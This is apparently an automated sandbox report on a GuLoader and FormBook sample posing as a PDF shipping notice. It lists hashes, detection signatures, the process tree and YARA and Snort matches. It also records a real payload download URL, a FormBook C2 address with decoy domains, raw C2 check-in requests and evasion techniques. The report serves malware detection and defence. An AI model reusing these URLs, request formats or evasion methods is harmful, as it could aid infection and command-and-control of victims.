Play interactive tour

Edit tour

Windows Analysis Report Arrival Notice, CIA Awb Inv Form.pdf.exe

Overview

General Information

Sample Name:	Arrival Notice, CIA Awb Inv Form.pdf.exe
Analysis ID:	527894
MD5:	ff71941571d8930c1125b3931d400d86
SHA1:	0a417bf568a5978777021e433bf4693893facd3e
SHA256:	bf952f1cd44de7bf63c63e502670d3a6a97eca1b5f7fd9981ed0d235351e975f
Infos:
Most interesting Screenshot:

Detection

FormBook GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Sigma detected: Suspicious Double Extension

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Yara detected Generic Dropper

Multi AV Scanner detection for submitted file

Yara detected FormBook

Malicious sample detected (through community Yara rule)

System process connects to network (likely due to code injection or exploit)

Yara detected GuLoader

Hides threads from debuggers

Sample uses process hollowing technique

Uses netstat to query active network connections and open ports

Maps a DLL or memory area into another process

Initial sample is a PE file and has a suspicious name

Tries to detect Any.run

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Modifies the prolog of user mode functions (user mode inline hooks)

Self deletion via cmd delete

Queues an APC in another process (thread injection)

Modifies the context of a thread in another process (thread injection)

Executable has a suspicious name (potential lure to open the executable)

C2 URLs / IPs found in malware configuration

Uses an obfuscated file name to hide its real file extension (double extension)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

JA3 SSL client fingerprint seen in connection with other malware

Contains functionality to call native functions

Creates processes with suspicious names

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Contains functionality for execution timing, often used to detect debuggers

Enables debug privileges

Found inlined nop instructions (likely shell or obfuscated code)

Sample file is different than original file name gathered from version info

PE file contains strange resources

Tries to load missing DLLs

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Checks if the current process is being debugged

PE / OLE file has an invalid certificate

Creates a process in suspended mode (likely to inject code)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

System is w10x64native

Arrival Notice, CIA Awb Inv Form.pdf.exe (PID: 4636 cmdline: "C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe" MD5: FF71941571D8930C1125B3931D400D86)

Arrival Notice, CIA Awb Inv Form.pdf.exe (PID: 7132 cmdline: "C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe" MD5: FF71941571D8930C1125B3931D400D86)

explorer.exe (PID: 4672 cmdline: C:\Windows\Explorer.EXE MD5: 5EA66FF5AE5612F921BC9DA23BAC95F7)

NETSTAT.EXE (PID: 5904 cmdline: C:\Windows\SysWOW64\NETSTAT.EXE MD5: 9DB170ED520A6DD57B5AC92EC537368A)

cmd.exe (PID: 3516 cmdline: /c del "C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 1324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "https://drive.google.com/uc?export=download&id=16igyruBe"}

Threatname: FormBook

{"C2 list": ["www.papllc.biz/s3f1/"], "decoy": ["teslaislandbois.com", "teslafreesuperchargermiles.com", "wifibudddy.sbs", "spmr.tv", "rossatospa.com", "crypto-cardano.com", "mvsteals.com", "amazonsellwithdiscount.com", "safety1-venture.us", "hara.cloud", "musee-radix-hairsalon.com", "celsb.com", "leaureveedhubert.com", "bncmobile.com", "bptrix.xyz", "wawadecoration.com", "redirect-amazones.com", "baseballinformatics.com", "predator.rest", "heinzelmaennchenltd.net", "metafacebookmessenger.com", "izivente.com", "evaccines.com", "alexacoyne.com", "emansdesign.com", "donefirsr.com", "ramel.us", "homie-hairsalon.com", "renatotomatis.com", "thecryptofirm.us", "4mtechmachines.com", "thaicharuen.com", "alexanderferency.com", "facebook-meta-morphosis.com", "spaziofellowes.com", "eggchanceapple.top", "trust2-profit.us", "investmenofpairs.club", "a.town", "soarlikeaneagle.site", "itssscraftingxo.com", "721369.online", "cornershopgoodwill.com", "programagubernamental.xyz", "siluca.biz", "rivianhawaii.com", "c2sh32.com", "meta-facebook.net", "amazonasmidia.com", "tmjuber.com", "venomous.kr", "stratosbuilder.com", "unitedlegalsolutions.us", "qivem.top", "federal-funds-deposit.com", "morningstarapparel.space", "verlag.us", "wwwdonefirst.com", "meta-morphosisfacebook.com", "mvrsfacebook.ca", "founditonamazon.net", "shellyperkowski.com", "firstsolar-s.com", "viiew.co"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000007.00000000.22694456011.000000000A598000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000007.00000000.22694456011.000000000A598000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x5839:$sqlite3step: 68 34 1C 7B E1 0x594c:$sqlite3step: 68 34 1C 7B E1 0x5868:$sqlite3text: 68 38 2A 90 C5 0x598d:$sqlite3text: 68 38 2A 90 C5 0x587b:$sqlite3blob: 68 53 D8 7F 8C 0x59a3:$sqlite3blob: 68 53 D8 7F 8C
00000007.00000000.22694456011.000000000A598000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x26a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x2191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x27a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x291f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x140c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x8917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x991a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000008.00000002.26929044585.00000000034CF000.00000004.00020000.sdmp	LokiBot_Dropper_Packed_R11_Feb18	Auto-generated rule - file scan copy.pdf.r11	Florian Roth	0x1c418:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
00000008.00000002.26923234058.0000000002962000.00000004.00000020.sdmp	LokiBot_Dropper_Packed_R11_Feb18	Auto-generated rule - file scan copy.pdf.r11	Florian Roth	0x1c410:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
00000006.00000002.22826427639.000000001E760000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000006.00000002.22826427639.000000001E760000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18839:$sqlite3step: 68 34 1C 7B E1 0x1894c:$sqlite3step: 68 34 1C 7B E1 0x18868:$sqlite3text: 68 38 2A 90 C5 0x1898d:$sqlite3text: 68 38 2A 90 C5 0x1887b:$sqlite3blob: 68 53 D8 7F 8C 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
00000006.00000002.22826427639.000000001E760000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000008.00000002.26922800429.0000000002800000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000008.00000002.26922800429.0000000002800000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18839:$sqlite3step: 68 34 1C 7B E1 0x1894c:$sqlite3step: 68 34 1C 7B E1 0x18868:$sqlite3text: 68 38 2A 90 C5 0x1898d:$sqlite3text: 68 38 2A 90 C5 0x1887b:$sqlite3blob: 68 53 D8 7F 8C 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
00000008.00000002.26922800429.0000000002800000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000008.00000002.26924489179.0000000002D00000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000008.00000002.26924489179.0000000002D00000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18839:$sqlite3step: 68 34 1C 7B E1 0x1894c:$sqlite3step: 68 34 1C 7B E1 0x18868:$sqlite3text: 68 38 2A 90 C5 0x1898d:$sqlite3text: 68 38 2A 90 C5 0x1887b:$sqlite3blob: 68 53 D8 7F 8C 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
00000008.00000002.26924489179.0000000002D00000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000008.00000002.26924755438.0000000002D30000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000008.00000002.26924755438.0000000002D30000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18839:$sqlite3step: 68 34 1C 7B E1 0x1894c:$sqlite3step: 68 34 1C 7B E1 0x18868:$sqlite3text: 68 38 2A 90 C5 0x1898d:$sqlite3text: 68 38 2A 90 C5 0x1887b:$sqlite3blob: 68 53 D8 7F 8C 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
00000008.00000002.26924755438.0000000002D30000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000006.00000000.22299792619.0000000000560000.00000040.00000001.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
00000001.00000002.22302999330.0000000002B60000.00000040.00000001.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
00000007.00000000.22745903057.000000000A598000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000007.00000000.22745903057.000000000A598000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x5839:$sqlite3step: 68 34 1C 7B E1 0x594c:$sqlite3step: 68 34 1C 7B E1 0x5868:$sqlite3text: 68 38 2A 90 C5 0x598d:$sqlite3text: 68 38 2A 90 C5 0x587b:$sqlite3blob: 68 53 D8 7F 8C 0x59a3:$sqlite3blob: 68 53 D8 7F 8C
00000007.00000000.22745903057.000000000A598000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x26a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x2191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x27a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x291f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x140c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x8917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x991a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000006.00000002.22815363833.00000000000A0000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000006.00000002.22815363833.00000000000A0000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18839:$sqlite3step: 68 34 1C 7B E1 0x1894c:$sqlite3step: 68 34 1C 7B E1 0x18868:$sqlite3text: 68 38 2A 90 C5 0x1898d:$sqlite3text: 68 38 2A 90 C5 0x1887b:$sqlite3blob: 68 53 D8 7F 8C 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
00000006.00000002.22815363833.00000000000A0000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
Process Memory Space: Arrival Notice, CIA Awb Inv Form.pdf.exe PID: 7132	JoeSecurity_GenericDropper	Yara detected Generic Dropper	Joe Security
Process Memory Space: NETSTAT.EXE PID: 5904	JoeSecurity_GenericDropper	Yara detected Generic Dropper	Joe Security
Click to see the 22 entries

Sigma Overview

System Summary:

Sigma detected: Suspicious Double Extension

Show sources

Source: Process started

Author: Florian Roth (rule), @blu3_team (idea): Data: Command: "C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe" , CommandLine: "C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe, NewProcessName: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe, OriginalFileName: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe, ParentCommandLine: "C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe" , ParentImage: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe, ParentProcessId: 4636, ProcessCommandLine: "C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe" , ProcessId: 7132

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 00000006.00000002.22826427639.000000001E760000.00000040.00020000.sdmp	Malware Configuration Extractor: FormBook {"C2 list": ["www.papllc.biz/s3f1/"], "decoy": ["teslaislandbois.com", "teslafreesuperchargermiles.com", "wifibudddy.sbs", "spmr.tv", "rossatospa.com", "crypto-cardano.com", "mvsteals.com", "amazonsellwithdiscount.com", "safety1-venture.us", "hara.cloud", "musee-radix-hairsalon.com", "celsb.com", "leaureveedhubert.com", "bncmobile.com", "bptrix.xyz", "wawadecoration.com", "redirect-amazones.com", "baseballinformatics.com", "predator.rest", "heinzelmaennchenltd.net", "metafacebookmessenger.com", "izivente.com", "evaccines.com", "alexacoyne.com", "emansdesign.com", "donefirsr.com", "ramel.us", "homie-hairsalon.com", "renatotomatis.com", "thecryptofirm.us", "4mtechmachines.com", "thaicharuen.com", "alexanderferency.com", "facebook-meta-morphosis.com", "spaziofellowes.com", "eggchanceapple.top", "trust2-profit.us", "investmenofpairs.club", "a.town", "soarlikeaneagle.site", "itssscraftingxo.com", "721369.online", "cornershopgoodwill.com", "programagubernamental.xyz", "siluca.biz", "rivianhawaii.com", "c2sh32.com", "meta-facebook.net", "amazonasmidia.com", "tmjuber.com", "venomous.kr", "stratosbuilder.com", "unitedlegalsolutions.us", "qivem.top", "federal-funds-deposit.com", "morningstarapparel.space", "verlag.us", "wwwdonefirst.com", "meta-morphosisfacebook.com", "mvrsfacebook.ca", "founditonamazon.net", "shellyperkowski.com", "firstsolar-s.com", "viiew.co"]}
Source: 00000006.00000000.22299792619.0000000000560000.00000040.00000001.sdmp	Malware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?export=download&id=16igyruBe"}

Multi AV Scanner detection for submitted file

Show sources

Source: Arrival Notice, CIA Awb Inv Form.pdf.exe	Virustotal: Detection: 37%			Perma Link
Source: Arrival Notice, CIA Awb Inv Form.pdf.exe	ReversingLabs: Detection: 31%

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000007.00000000.22694456011.000000000A598000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.22826427639.000000001E760000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.26922800429.0000000002800000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.26924489179.0000000002D00000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.26924755438.0000000002D30000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.22745903057.000000000A598000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.22815363833.00000000000A0000.00000040.00020000.sdmp, type: MEMORY

Source: Arrival Notice, CIA Awb Inv Form.pdf.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: unknown	HTTPS traffic detected: 142.250.185.110:443 -> 192.168.11.20:49805 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.186.97:443 -> 192.168.11.20:49806 version: TLS 1.2

Source:	Binary string: netstat.pdbGCTL source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22815632150.00000000000D0000.00000040.00020000.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22817948839.0000000000981000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22826316782.000000001E660000.00000004.00000001.sdmp
Source:	Binary string: netstat.pdb source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22815632150.00000000000D0000.00000040.00020000.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22817948839.0000000000981000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22826316782.000000001E660000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdbUGP source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22827147286.000000001E9C0000.00000040.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22829090825.000000001EAED000.00000040.00000001.sdmp, NETSTAT.EXE, 00000008.00000002.26925337058.0000000002F80000.00000040.00000001.sdmp, NETSTAT.EXE, 00000008.00000002.26926665832.00000000030AD000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: Arrival Notice, CIA Awb Inv Form.pdf.exe, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22827147286.000000001E9C0000.00000040.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22829090825.000000001EAED000.00000040.00000001.sdmp, NETSTAT.EXE, NETSTAT.EXE, 00000008.00000002.26925337058.0000000002F80000.00000040.00000001.sdmp, NETSTAT.EXE, 00000008.00000002.26926665832.00000000030AD000.00000040.00000001.sdmp

Source: C:\Windows\SysWOW64\NETSTAT.EXE

Code function: 4x nop then pop esi

8_2_0281731A

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49816 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49816 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49816 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49821 -> 35.198.112.85:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49821 -> 35.198.112.85:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49821 -> 35.198.112.85:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49826 -> 184.168.98.97:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49826 -> 184.168.98.97:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49826 -> 184.168.98.97:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49827 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49827 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49827 -> 34.102.136.180:80

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Network Connect: 154.94.229.8 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 107.178.157.225 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 3.64.163.50 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 35.198.112.85 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 70.40.220.123 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 183.181.99.12 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 184.168.98.97 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 34.102.136.180 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 64.190.62.111 80	Jump to behavior

Uses netstat to query active network connections and open ports

Show sources

Source: C:\Windows\explorer.exe

Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor	URLs: https://drive.google.com/uc?export=download&id=16igyruBe
Source: Malware configuration extractor	URLs: www.papllc.biz/s3f1/

Source: Joe Sandbox View	ASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
Source: Joe Sandbox View	ASN Name: ROOTNETWORKSUS ROOTNETWORKSUS

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: global traffic	HTTP traffic detected: GET /s3f1/?0v=PTZX9bbDrHz+cSGvcymGk0mts24461Z1qQ1nyKxozOrcJ62jRcnhMEjPJVIjYEdLVzgY&kTGXE2=5jpDxBr8jNJ0VnGP HTTP/1.1Host: www.izivente.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /s3f1/?0v=djAV39Fd+2tTaJZ0vMg9wx3f2dAzn5uoNnRL0R1SzoIuCwqtHRucI/njP/LN+anlykG6&kTGXE2=5jpDxBr8jNJ0VnGP HTTP/1.1Host: www.musee-radix-hairsalon.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /s3f1/?0v=sqInqd/J1oF05xIRIYy6fIocxGbhQvf/UJ8WsTvvwcutrQRehAYuBiNZHMXnLC/ELIDP&kTGXE2=5jpDxBr8jNJ0VnGP HTTP/1.1Host: www.teslafreesuperchargermiles.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /s3f1/?0v=SHCw80AJpwYBr9Gcy19d9t3wNH3OULHDJ3WoL9xOYwR6hbrNjBBxIJP5Ay3SVk+aC6rM&kTGXE2=5jpDxBr8jNJ0VnGP HTTP/1.1Host: www.mvsteals.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /s3f1/?0v=mH/60k+8QaINko6jE2QpZl5PE74OV+HVH/ClSiWHQSmVZS7BQfRqR+Cg+8qmWPEHLuT3&kTGXE2=5jpDxBr8jNJ0VnGP HTTP/1.1Host: www.thaicharuen.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /s3f1/?0v=UFnETU8dieTu408infxPFcIZ9A51JABruIfjxtzTo70f1rUHWxHKXlzNhsAQN9Kxpi4c&kTGXE2=5jpDxBr8jNJ0VnGP HTTP/1.1Host: www.morningstarapparel.spaceConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /s3f1/?0v=09o28MjQy1cZQ5Pjj+CLcbQvMAiWJGV2Uxg7+ScaYTXEQUafs3S8SGgaduHkLU6DHZH5&kTGXE2=5jpDxBr8jNJ0VnGP HTTP/1.1Host: www.soarlikeaneagle.siteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /s3f1/?0v=mbzqDKJ3zGVZXRXzBR45Cgdnnesr2+nRJSwniRIMGUaPxNPQA+ji5LfWApDcm/CqO18J&kTGXE2=5jpDxBr8jNJ0VnGP HTTP/1.1Host: www.evaccines.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /s3f1/?0v=NBR0aPdzKjxBJ/qIBF///end99Hz3MSBKbZXqSBgBb5XrtkET9he0lXIERUBepCdWUFS&kTGXE2=5jpDxBr8jNJ0VnGP HTTP/1.1Host: www.celsb.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /s3f1/?0v=d8/OqiJyMkDaGTNTMgoxgiTtJv1BTsaVDDjuqFtpNub02Pcaaru29SvOabQgh8wWKZWy&hXeT=Wxlp HTTP/1.1Host: www.4mtechmachines.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /s3f1/?0v=F/pbsBegFO7o3fLKo/FzEC9ZwTRXzaIgUSgpsvNThmOurZQxU5rRi5MGW6g3EwPdsbP6&hXeT=Wxlp HTTP/1.1Host: www.hara.cloudConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View

IP Address: 64.190.62.111 64.190.62.111

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=16igyruBeyi1SLH2lfqbjS2ggty9bFGFC HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
